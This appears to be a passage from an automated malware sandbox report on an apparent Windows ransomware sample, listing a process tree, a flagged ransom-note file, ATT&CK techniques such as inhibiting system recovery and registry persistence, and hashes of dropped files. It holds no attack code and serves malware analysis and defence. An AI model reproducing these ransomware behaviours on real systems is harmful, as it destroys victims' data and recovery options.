        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
        5⤵
        
        PID:5060
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5048
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
        5⤵
        
        PID:3264
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1
        5⤵
        
        PID:3484
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
        5⤵
        
        PID:2276
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5272 /prefetch:8
        5⤵
        
        PID:3868
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
        5⤵
        
        PID:3504
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
        5⤵
        
        PID:532
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4116 /prefetch:8
        5⤵
        
        PID:4316
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4024 /prefetch:8
        5⤵
        
        PID:1860
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        5⤵
        Drops file in Program Files directory
        
        PID:1428
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x1fc,0x230,0x7ff6393b5460,0x7ff6393b5470,0x7ff6393b5480
        6⤵
        
        PID:4268
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4024 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1960
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
        5⤵
        
        PID:2588
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
        5⤵
        
        PID:5068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13705484081182719710,7567787830047399585,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
        5⤵
        
        PID:4544

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3628

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2692

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RestoreShow.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2356

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF

Filesize
746B

MD5
78d7e8695db9b2f37cfac73852138e73

SHA1
f55661f7887361c663d3d6ac0c510d33fa630048

SHA256
e3a137cc5ab945a015f1c737a27ce74290c1314c8a7b71d8575f10a01527528a

SHA512
157c6f9044ca307f2e6d07859a0ae75167589e32d541c6bfe666de31f983dca362bf55d11a8215c2e659f5ae8113de8067fa5927c6bdbd53b9a9636376225f03

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF

Filesize
408B

MD5
81520359966cac4aa43466f10d02b15c

SHA1
b5c64f6ab59494f1f4813f2a01facffedb1566a7

SHA256
1e2f971b50106a089baac30b46c6cef3971abda820db340e4a89b3daa60e7ecf

SHA512
47b9a4bba99f02ff81839f1480e8d189245233b0711178f2a69eebd72ae3eaca2e43bee327897e1458f1db207a6b2a0872d7358f204a288d0b379dc2dcf73b8c

Download Submit
C:\Users\Public\bjsocea

Filesize
3KB

MD5
49eac8d576681efe19b67231c07795a0

SHA1
9cd795e11c3078efdd008091f18e86b325f8f892

SHA256
331cf86f3fda9e909d1c1521acfa72574f2ce6ff74912012ae75261c0d06846c

SHA512
899933bdadfe1e5aaa25302e869031bee84d9931be6a9ee8f1fe9164c2f4cfc27d363a05e31606919b1e6b2d134446935e5c0cd2697c8bd02ec3c59db380d6a8

Download Submit
C:\Users\Public\bjsocea

Filesize
3KB

MD5
49eac8d576681efe19b67231c07795a0

SHA1
9cd795e11c3078efdd008091f18e86b325f8f892

SHA256
331cf86f3fda9e909d1c1521acfa72574f2ce6ff74912012ae75261c0d06846c

SHA512
899933bdadfe1e5aaa25302e869031bee84d9931be6a9ee8f1fe9164c2f4cfc27d363a05e31606919b1e6b2d134446935e5c0cd2697c8bd02ec3c59db380d6a8

Download Submit
C:\Users\Public\bjsocea

Filesize
3KB

MD5
49eac8d576681efe19b67231c07795a0

SHA1
9cd795e11c3078efdd008091f18e86b325f8f892

SHA256
331cf86f3fda9e909d1c1521acfa72574f2ce6ff74912012ae75261c0d06846c

SHA512
899933bdadfe1e5aaa25302e869031bee84d9931be6a9ee8f1fe9164c2f4cfc27d363a05e31606919b1e6b2d134446935e5c0cd2697c8bd02ec3c59db380d6a8

Download Submit
C:\Users\Public\w8q31a55

Filesize
1KB

MD5
d4187737377edd4a5fddf9ee201f8bfb

SHA1
ef8c59d456c2a880fbeaac060629d5060dad072e

SHA256
0fc745584c1284541f68a628eb3754a6f0c4c99a91cdfcc698127e96920f265a

SHA512
a682e1aa30e437a458ad880e8b8d750267b5111425c938a8d216c4df97c177d9410048d009d2f7827c5df44985bba14610e332aae3b4176efb62f570e7c5a19f

Download Submit
C:\Users\Public\w8q31a55

Filesize
1KB

MD5
d4187737377edd4a5fddf9ee201f8bfb

SHA1
ef8c59d456c2a880fbeaac060629d5060dad072e

SHA256
0fc745584c1284541f68a628eb3754a6f0c4c99a91cdfcc698127e96920f265a

SHA512
a682e1aa30e437a458ad880e8b8d750267b5111425c938a8d216c4df97c177d9410048d009d2f7827c5df44985bba14610e332aae3b4176efb62f570e7c5a19f

Download Submit
C:\Users\Public\w8q31a55

Filesize
1KB

MD5
d4187737377edd4a5fddf9ee201f8bfb

SHA1
ef8c59d456c2a880fbeaac060629d5060dad072e

SHA256
0fc745584c1284541f68a628eb3754a6f0c4c99a91cdfcc698127e96920f265a

SHA512
a682e1aa30e437a458ad880e8b8d750267b5111425c938a8d216c4df97c177d9410048d009d2f7827c5df44985bba14610e332aae3b4176efb62f570e7c5a19f

Download Submit
C:\Windows\Installer\MSI3F0C.tmp

Filesize
50KB

MD5
19fa3be964d43ee5eaddb1198cb34cfa

SHA1
08214c36b827979ff393daf669709e516b305e49

SHA256
d7d84566e143a0fc4b838db72a58a909966c190a7c3c6eb16d50ca89ab11b373

SHA512
7c0b1200027e6b9ede998c0bb321ceb5427c4e6325edb79323f078653accf21be189643aaaeb472d24d5b814b9613e54bffabbba728c8f86e35bdfaad9814738

Download Submit
C:\Windows\Installer\MSI3F0C.tmp

Filesize
50KB

MD5
19fa3be964d43ee5eaddb1198cb34cfa

SHA1
08214c36b827979ff393daf669709e516b305e49

SHA256
d7d84566e143a0fc4b838db72a58a909966c190a7c3c6eb16d50ca89ab11b373

SHA512
7c0b1200027e6b9ede998c0bb321ceb5427c4e6325edb79323f078653accf21be189643aaaeb472d24d5b814b9613e54bffabbba728c8f86e35bdfaad9814738

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
23.0MB

MD5
35d076a82e1672f6c7cf145917c06039

SHA1
f282adbb5ff4429eb02ae1b9f900e9b180ba49a2

SHA256
e879cbab8f4bbcc1ab98e60882bc7a2fa77882abe4fe749d48fcd277d2bdfa06

SHA512
1a651c62fc2b117967d08de98410981aa0c7f232bcc10fc1045fa25eaac8eacb9a637e95a89bf18995e8571e406f7ed896dc8f7f2e569a593525ac2fc1b197aa

Download Submit
\??\Volume{06969d78-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{c2e7e618-f8f1-49a1-85e4-aeae47910c7a}_OnDiskSnapshotProp

Filesize
5KB

MD5
71c5bbe3c210d7b095200fc0102c71b1

SHA1
b0165c6f4c00490d64383f7ca8ff8fe8346d764d

SHA256
5c3dc9fcf5db04f72c5f1544973110760db2ab0f16f17d9215627d1f5fb5a087

SHA512
49ebcc855812a7cdfcb2003c4dd85e19b257afea16fb72b4ed2a94f95a88934e422a9693386f2575ed4d912e4d21e1f495baec3de4a5668ecc941202326b579b

Download Submit
\??\pipe\LOCAL\crashpad_3972_CYYQJEWSQOBKJDQL

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/224-176-0x0000000000000000-mapping.dmp

Download
memory/532-168-0x0000000000000000-mapping.dmp

Download
memory/776-181-0x0000000000000000-mapping.dmp

Download
memory/840-150-0x0000000000000000-mapping.dmp

Download
memory/884-132-0x0000000000000000-mapping.dmp

Download
memory/1236-143-0x0000000000000000-mapping.dmp

Download
memory/1360-174-0x0000000000000000-mapping.dmp

Download
memory/1428-184-0x0000000000000000-mapping.dmp

Download
memory/1428-169-0x0000000000000000-mapping.dmp

Download
memory/1484-142-0x0000000000000000-mapping.dmp

Download
memory/1500-171-0x0000000000000000-mapping.dmp

Download
memory/1860-196-0x0000000000000000-mapping.dmp

Download
memory/1960-186-0x0000000000000000-mapping.dmp

Download
memory/2012-192-0x0000000000000000-mapping.dmp

Download
memory/2276-175-0x0000000000000000-mapping.dmp

Download
memory/2276-160-0x0000000000000000-mapping.dmp

Download
memory/2356-200-0x0000000000000000-mapping.dmp

Download
memory/2588-188-0x0000000000000000-mapping.dmp

Download
memory/2692-182-0x0000000000000000-mapping.dmp

Download
memory/2768-148-0x0000022C85450000-0x0000022C85453000-memory.dmp

Filesize
12KB

Download
memory/2864-191-0x0000000000000000-mapping.dmp

Download
memory/2864-198-0x0000000000000000-mapping.dmp

Download
memory/3112-173-0x0000000000000000-mapping.dmp

Download
memory/3264-156-0x0000000000000000-mapping.dmp

Download
memory/3288-193-0x0000000000000000-mapping.dmp

Download
memory/3484-158-0x0000000000000000-mapping.dmp

Download
memory/3504-164-0x0000000000000000-mapping.dmp

Download
memory/3712-180-0x0000000000000000-mapping.dmp

Download
memory/3856-172-0x0000000000000000-mapping.dmp

Download
memory/3868-162-0x0000000000000000-mapping.dmp

Download
memory/3972-149-0x0000000000000000-mapping.dmp

Download
memory/4268-185-0x0000000000000000-mapping.dmp

Download
memory/4316-179-0x0000000000000000-mapping.dmp

Download
memory/4448-197-0x0000000000000000-mapping.dmp

Download
memory/4544-195-0x0000000000000000-mapping.dmp

Download
memory/4544-204-0x0000000000000000-mapping.dmp

Download
memory/4568-199-0x0000000000000000-mapping.dmp

Download
memory/4604-183-0x0000000000000000-mapping.dmp

Download
memory/4668-146-0x0000000000000000-mapping.dmp

Download
memory/4784-189-0x0000000000000000-mapping.dmp

Download
memory/4996-144-0x0000000000000000-mapping.dmp

Download
memory/5008-194-0x0000000000000000-mapping.dmp

Download
memory/5012-190-0x0000000000000000-mapping.dmp

Download
memory/5048-153-0x0000000000000000-mapping.dmp

Download
memory/5060-152-0x0000000000000000-mapping.dmp

Download
memory/5068-202-0x0000000000000000-mapping.dmp

Download
memory/5068-170-0x0000000000000000-mapping.dmp

Download
memory/5080-135-0x0000000000000000-mapping.dmp

Download
memory/5080-147-0x000001D4CA7D0000-0x000001D4CA7DC000-memory.dmp

Filesize
48KB

Download